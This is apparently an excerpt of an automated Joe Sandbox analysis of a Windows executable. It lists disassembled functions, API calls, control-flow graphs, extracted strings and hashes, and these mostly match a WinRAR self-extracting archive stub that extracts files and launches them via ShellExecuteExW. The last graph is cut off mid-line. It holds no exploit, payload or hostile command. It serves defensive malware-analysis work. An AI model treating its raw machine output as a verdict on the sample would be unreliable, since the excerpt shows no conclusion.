                                                                                            • Instruction ID: 2978016e743ba0d9d4b5c8c4719b6f5495598a3f8fd3699eb85cfc46f4e82817
                                                                                            • Opcode Fuzzy Hash: 815c8d05e46b950f8a647f0b3bdd5ac72a4b2850899bbdd942a792a1b1c19d35
                                                                                            • Instruction Fuzzy Hash: EA82FA71904345AEDF25DF64C891BFEBBB9BF05300F0841B9F8499B242DB795A88CB60
                                                                                            Function 00A4B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A4B7E5
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4B8D1
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B8EF
                                                                                            • IsDialogMessageW.USER32(?,?), ref: 00A4B902
                                                                                            • TranslateMessage.USER32(?), ref: 00A4B910
                                                                                            • DispatchMessageW.USER32(?), ref: 00A4B91A
                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00A4B93D
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00A4B960
                                                                                            • GetDlgItem.USER32(?,00000068), ref: 00A4B983
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A4B99E
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00A635F4), ref: 00A4B9B1
                                                                                              • Part of subcall function 00A4D453: _wcslen.LIBCMT ref: 00A4D47D
                                                                                            • SetFocus.USER32(00000000), ref: 00A4B9B8
                                                                                            • _swprintf.LIBCMT ref: 00A4BA24
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                              • Part of subcall function 00A4D4D4: GetDlgItem.USER32(00000068,00A8FCB8), ref: 00A4D4E8
                                                                                              • Part of subcall function 00A4D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00A4AF07,00000001,?,?,00A4B7B9,00A6506C,00A8FCB8,00A8FCB8,00001000,00000000,00000000), ref: 00A4D510
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A4D51B
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00A635F4), ref: 00A4D529
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D53F
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A4D559
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D59D
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A4D5AB
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D5BA
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D5E1
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00A643F4), ref: 00A4D5F0
                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A4BA68
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00A4BA90
                                                                                            • GetTickCount.KERNEL32 ref: 00A4BAAE
                                                                                            • _swprintf.LIBCMT ref: 00A4BAC2
                                                                                            • GetLastError.KERNEL32(?,00000011), ref: 00A4BAF4
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00A4BB43
                                                                                            • _swprintf.LIBCMT ref: 00A4BB7C
                                                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00A4BBD0
                                                                                            • GetCommandLineW.KERNEL32 ref: 00A4BBEA
                                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00A4BC47
                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00A4BC6F
                                                                                            • Sleep.KERNEL32(00000064), ref: 00A4BCB9
                                                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00A4BCE2
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A4BCEB
                                                                                            • _swprintf.LIBCMT ref: 00A4BD1E
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4BD7D
                                                                                            • SetDlgItemTextW.USER32(?,00000065,00A635F4), ref: 00A4BD94
                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00A4BD9D
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00A4BDAC
                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A4BDBB
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4BE68
                                                                                            • _wcslen.LIBCMT ref: 00A4BEBE
                                                                                            • _swprintf.LIBCMT ref: 00A4BEE8
                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A4BF32
                                                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00A4BF4C
                                                                                            • GetDlgItem.USER32(?,00000068), ref: 00A4BF55
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00A4BF6B
                                                                                            • GetDlgItem.USER32(?,00000066), ref: 00A4BF85
                                                                                            • SetWindowTextW.USER32(00000000,00A7A472), ref: 00A4BFA7
                                                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00A4C007
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4C01A
                                                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00A4C0BD
                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00A4C197
                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00A4C1D9
                                                                                              • Part of subcall function 00A4C73F: __EH_prolog.LIBCMT ref: 00A4C744
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4C1FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                            • API String ID: 3445078344-2238251102
                                                                                            • Opcode ID: 0d9ddb930817e6259e5672d58b7d266398b6a31393156d97010bf084093c2260
                                                                                            • Instruction ID: b1befdcaedd54bb6c38a775d3894eb87c3959a20729de959ef4ca828ae1df7f2
                                                                                            • Opcode Fuzzy Hash: 0d9ddb930817e6259e5672d58b7d266398b6a31393156d97010bf084093c2260
                                                                                            • Instruction Fuzzy Hash: EE42E475A84244BEEF21EBF49D4AFBE377CAB41700F004155F649A60E2CBB49E46CB21
                                                                                            Function 00A40863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 268 a40863-a40886 call a4ec50 GetModuleHandleW 271 a408e7-a40b48 268->271 272 a40888-a4089f GetProcAddress 268->272 273 a40c14-a40c40 GetModuleFileNameW call a3c29a call a40602 271->273 274 a40b4e-a40b59 call a575fb 271->274 275 a408a1-a408b7 272->275 276 a408b9-a408c9 GetProcAddress 272->276 291 a40c42-a40c4e call a3b146 273->291 274->273 285 a40b5f-a40b8d GetModuleFileNameW CreateFileW 274->285 275->276 279 a408e5 276->279 280 a408cb-a408e0 276->280 279->271 280->279 288 a40b8f-a40b9b SetFilePointer 285->288 289 a40c08-a40c0f CloseHandle 285->289 288->289 292 a40b9d-a40bb9 ReadFile 288->292 289->273 297 a40c50-a40c5b call a4081b 291->297 298 a40c7d-a40ca4 call a3c310 GetFileAttributesW 291->298 292->289 294 a40bbb-a40be0 292->294 296 a40bfd-a40c06 call a40371 294->296 296->289 304 a40be2-a40bfc call a4081b 296->304 297->298 309 a40c5d-a40c7b CompareStringW 297->309 306 a40ca6-a40caa 298->306 307 a40cae 298->307 304->296 306->291 310 a40cac 306->310 311 a40cb0-a40cb5 307->311 309->298 309->306 310->311 313 a40cb7 311->313 314 a40cec-a40cee 311->314 315 a40cb9-a40ce0 call a3c310 GetFileAttributesW 313->315 316 a40cf4-a40d0b call a3c2e4 call a3b146 314->316 317 a40dfb-a40e05 314->317 323 a40ce2-a40ce6 315->323 324 a40cea 315->324 327 a40d73-a40da6 call a34092 AllocConsole 316->327 328 a40d0d-a40d6e call a4081b * 2 call a3e617 call a34092 call a3e617 call a4a7e4 316->328 323->315 326 a40ce8 323->326 324->314 326->314 333 a40df3-a40df5 ExitProcess 327->333 334 a40da8-a40ded GetCurrentProcessId AttachConsole call a53e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00A4087C
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A4088E
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A408BF
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A40B69
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A40B83
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A40B93
                                                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00A63C7C,00000000), ref: 00A40BB1
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A40C09
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A40C1E
                                                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00A63C7C,?,00000000,?,00000800), ref: 00A40C72
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00A63C7C,00000800,?,00000000,?,00000800), ref: 00A40C9C
                                                                                            • GetFileAttributesW.KERNEL32(?,?,00A63D44,00000800), ref: 00A40CD8
                                                                                              • Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                              • Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            • _swprintf.LIBCMT ref: 00A40D4A
                                                                                            • _swprintf.LIBCMT ref: 00A40D96
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • AllocConsole.KERNEL32 ref: 00A40D9E
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00A40DA8
                                                                                            • AttachConsole.KERNEL32(00000000), ref: 00A40DAF
                                                                                            • _wcslen.LIBCMT ref: 00A40DC4
                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A40DD5
                                                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00A40DDC
                                                                                            • Sleep.KERNEL32(00002710), ref: 00A40DE7
                                                                                            • FreeConsole.KERNEL32 ref: 00A40DED
                                                                                            • ExitProcess.KERNEL32 ref: 00A40DF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                            • API String ID: 1207345701-3298887752
                                                                                            • Opcode ID: 9944b1a78ca2d1ad9eeebc35c39cb699ccfd2841119118dc76aabcdf77bf6722
                                                                                            • Instruction ID: a2ab7ed63aaedf8c9b095e058f79ab2e096e11e01afdc104b7a26e4b2f4b3c7a
                                                                                            • Opcode Fuzzy Hash: 9944b1a78ca2d1ad9eeebc35c39cb699ccfd2841119118dc76aabcdf77bf6722
                                                                                            • Instruction Fuzzy Hash: 24D154B2408344ABDB21DFA08949F9FBAF8BB85704F51491DF2859B150C7B5864ECBA2
                                                                                            Function 00A4C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 347 a4c73f-a4c757 call a4eb78 call a4ec50 352 a4d40d-a4d418 347->352 353 a4c75d-a4c787 call a4b314 347->353 353->352 356 a4c78d-a4c792 353->356 357 a4c793-a4c7a1 356->357 358 a4c7a2-a4c7b7 call a4af98 357->358 361 a4c7b9 358->361 362 a4c7bb-a4c7d0 call a41fbb 361->362 365 a4c7d2-a4c7d6 362->365 366 a4c7dd-a4c7e0 362->366 365->362 369 a4c7d8 365->369 367 a4c7e6 366->367 368 a4d3d9-a4d404 call a4b314 366->368 370 a4ca7c-a4ca7e 367->370 371 a4c7ed-a4c7f0 367->371 372 a4c9be-a4c9c0 367->372 373 a4ca5f-a4ca61 367->373 368->357 381 a4d40a-a4d40c 368->381 369->368 370->368 378 a4ca84-a4ca8b 370->378 371->368 376 a4c7f6-a4c850 call a4a64d call a3bdf3 call a3a544 call a3a67e call a36edb 371->376 372->368 375 a4c9c6-a4c9d2 372->375 373->368 377 a4ca67-a4ca77 SetWindowTextW 373->377 382 a4c9d4-a4c9e5 call a57686 375->382 383 a4c9e6-a4c9eb 375->383 438 a4c98f-a4c9a4 call a3a5d1 376->438 377->368 378->368 380 a4ca91-a4caaa 378->380 385 a4cab2-a4cac0 call a53e13 380->385 386 a4caac 380->386 381->352 382->383 389 a4c9f5-a4ca00 call a4b48e 383->389 390 a4c9ed-a4c9f3 383->390 385->368 401 a4cac6-a4cacf 385->401 386->385 394 a4ca05-a4ca07 389->394 390->394 399 a4ca12-a4ca32 call a53e13 call a53e3e 394->399 400 a4ca09-a4ca10 call a53e13 394->400 421 a4ca34-a4ca3b 399->421 422 a4ca4b-a4ca4d 399->422 400->399 406 a4cad1-a4cad5 401->406 407 a4caf8-a4cafb 401->407 411 a4cad7-a4cadf 406->411 412 a4cb01-a4cb04 406->412 407->412 414 a4cbe0-a4cbee call a40602 407->414 411->368 417 a4cae5-a4caf3 call a40602 411->417 419 a4cb06-a4cb0b 412->419 420 a4cb11-a4cb2c 412->420 430 a4cbf0-a4cc04 call a5279b 414->430 417->430 419->414 419->420 433 a4cb76-a4cb7d 420->433 434 a4cb2e-a4cb68 420->434 427 a4ca42-a4ca4a call a57686 421->427 428 a4ca3d-a4ca3f 421->428 422->368 429 a4ca53-a4ca5a call a53e2e 422->429 427->422 428->427 429->368 447 a4cc06-a4cc0a 430->447 448 a4cc11-a4cc62 call a40602 call a4b1be GetDlgItem SetWindowTextW SendMessageW call a53e49 430->448 440 a4cb7f-a4cb97 call a53e13 433->440 441 a4cbab-a4cbce call a53e13 * 2 433->441 467 a4cb6c-a4cb6e 434->467 468 a4cb6a 434->468 454 a4c855-a4c869 SetFileAttributesW 438->454 455 a4c9aa-a4c9b9 call a3a55a 438->455 440->441 460 a4cb99-a4cba6 call a405da 440->460 441->430 474 a4cbd0-a4cbde call a405da 441->474 447->448 453 a4cc0c-a4cc0e 447->453 481 a4cc67-a4cc6b 448->481 453->448 461 a4c90f-a4c91f GetFileAttributesW 454->461 462 a4c86f-a4c8a2 call a3b991 call a3b690 call a53e13 454->462 455->368 460->441 461->438 466 a4c921-a4c930 DeleteFileW 461->466 490 a4c8a4-a4c8b3 call a53e13 462->490 491 a4c8b5-a4c8c3 call a3bdb4 462->491 466->438 475 a4c932-a4c935 466->475 467->433 468->467 474->430 479 a4c939-a4c965 call a34092 GetFileAttributesW 475->479 488 a4c937-a4c938 479->488 489 a4c967-a4c97d MoveFileW 479->489 481->368 485 a4cc71-a4cc85 SendMessageW 481->485 485->368 488->479 489->438 492 a4c97f-a4c989 MoveFileExW 489->492 490->491 497 a4c8c9-a4c908 call a53e13 call a4fff0 490->497 491->455 491->497 492->438 497->461
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A4C744
                                                                                              • Part of subcall function 00A4B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A4B3FB
                                                                                            • _wcslen.LIBCMT ref: 00A4CA0A
                                                                                            • _wcslen.LIBCMT ref: 00A4CA13
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00A4CA71
                                                                                            • _wcslen.LIBCMT ref: 00A4CAB3
                                                                                            • _wcsrchr.LIBVCRUNTIME ref: 00A4CBFB
                                                                                            • GetDlgItem.USER32(?,00000066), ref: 00A4CC36
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00A4CC46
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,00A7A472), ref: 00A4CC54
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A4CC7F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                            • API String ID: 2804936435-312220925
                                                                                            • Opcode ID: 0230cbf42f532f58a2490a14bd183ca0183540cbce94bae503f1505636259583
                                                                                            • Instruction ID: 50341878d0119a7ff363ab42336a945964295e6336ca768ee8bebcdcecd80225
                                                                                            • Opcode Fuzzy Hash: 0230cbf42f532f58a2490a14bd183ca0183540cbce94bae503f1505636259583
                                                                                            • Instruction Fuzzy Hash: 41E16476901218AADF24DBA0DD85EEE73BCEB45350F1080A6FA09E7051EF749F858F60
                                                                                            Function 00A3DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A3DA70
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A3DAAC
                                                                                              • Part of subcall function 00A3C29A: _wcslen.LIBCMT ref: 00A3C2A2
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                              • Part of subcall function 00A41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A3BAE9,00000000,?,?,?,00010426), ref: 00A41BA0
                                                                                            • _wcslen.LIBCMT ref: 00A3DDE9
                                                                                            • __fprintf_l.LIBCMT ref: 00A3DF1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                            • API String ID: 566448164-801612888
                                                                                            • Opcode ID: 6d7adbad35ae084d6b9f19ab5ccd3885e44aa6aa8bc5659a9827f1c6a07ae847
                                                                                            • Instruction ID: a52f1b54810b6706bf74461c30fc6b09de8bcdeb4a356faee4ca0716b2628cb9
                                                                                            • Opcode Fuzzy Hash: 6d7adbad35ae084d6b9f19ab5ccd3885e44aa6aa8bc5659a9827f1c6a07ae847
                                                                                            • Instruction Fuzzy Hash: 4E32BF72A00218EBCF28EF68D942BEA77B5FF55700F40455AF905AB281EBB1DD85CB50
                                                                                            Function 00A4D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                              • Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                              • Part of subcall function 00A4B568: IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                              • Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                              • Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            • GetDlgItem.USER32(00000068,00A8FCB8), ref: 00A4D4E8
                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00A4AF07,00000001,?,?,00A4B7B9,00A6506C,00A8FCB8,00A8FCB8,00001000,00000000,00000000), ref: 00A4D510
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A4D51B
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00A635F4), ref: 00A4D529
                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D53F
                                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A4D559
                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D59D
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A4D5AB
                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D5BA
                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D5E1
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00A643F4), ref: 00A4D5F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                            • String ID: \
                                                                                            • API String ID: 3569833718-2967466578
                                                                                            • Opcode ID: 8f4ca7a166e39177ae78f31bd2fb2a16100bf9165e06ba0353e79f1d649ea6ca
                                                                                            • Instruction ID: f1a75b24150a6616f6b285312c49f20e99a1cc8008ebbecf2de5940b6a19c148
                                                                                            • Opcode Fuzzy Hash: 8f4ca7a166e39177ae78f31bd2fb2a16100bf9165e06ba0353e79f1d649ea6ca
                                                                                            • Instruction Fuzzy Hash: 7931CF76245352BFE701DF609C4AFAF7FBCEB86708F000509F651961A0DB658A068B76
                                                                                            Function 00A4D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 836 a4d78f-a4d7a7 call a4ec50 839 a4d7ad-a4d7b9 call a53e13 836->839 840 a4d9e8-a4d9f0 836->840 839->840 843 a4d7bf-a4d7e7 call a4fff0 839->843 846 a4d7f1-a4d7ff 843->846 847 a4d7e9 843->847 848 a4d801-a4d804 846->848 849 a4d812-a4d818 846->849 847->846 850 a4d808-a4d80e 848->850 851 a4d85b-a4d85e 849->851 853 a4d837-a4d844 850->853 854 a4d810 850->854 851->850 852 a4d860-a4d866 851->852 857 a4d86d-a4d86f 852->857 858 a4d868-a4d86b 852->858 855 a4d9c0-a4d9c2 853->855 856 a4d84a-a4d84e 853->856 859 a4d822-a4d82c 854->859 860 a4d9c6 855->860 856->860 861 a4d854-a4d859 856->861 862 a4d882-a4d898 call a3b92d 857->862 863 a4d871-a4d878 857->863 858->857 858->862 864 a4d82e 859->864 865 a4d81a-a4d820 859->865 869 a4d9cf 860->869 861->851 872 a4d8b1-a4d8bc call a3a231 862->872 873 a4d89a-a4d8a7 call a41fbb 862->873 863->862 866 a4d87a 863->866 864->853 865->859 868 a4d830-a4d833 865->868 866->862 868->853 871 a4d9d6-a4d9d8 869->871 875 a4d9e7 871->875 876 a4d9da-a4d9dc 871->876 882 a4d8be-a4d8d5 call a3b6c4 872->882 883 a4d8d9-a4d8e6 ShellExecuteExW 872->883 873->872 881 a4d8a9 873->881 875->840 876->875 879 a4d9de-a4d9e1 ShowWindow 876->879 879->875 881->872 882->883 883->875 885 a4d8ec-a4d8f9 883->885 887 a4d90c-a4d90e 885->887 888 a4d8fb-a4d902 885->888 890 a4d925-a4d944 call a4dc3b 887->890 891 a4d910-a4d919 887->891 888->887 889 a4d904-a4d90a 888->889 889->887 892 a4d97b-a4d987 CloseHandle 889->892 890->892 905 a4d946-a4d94e 890->905 891->890 900 a4d91b-a4d923 ShowWindow 891->900 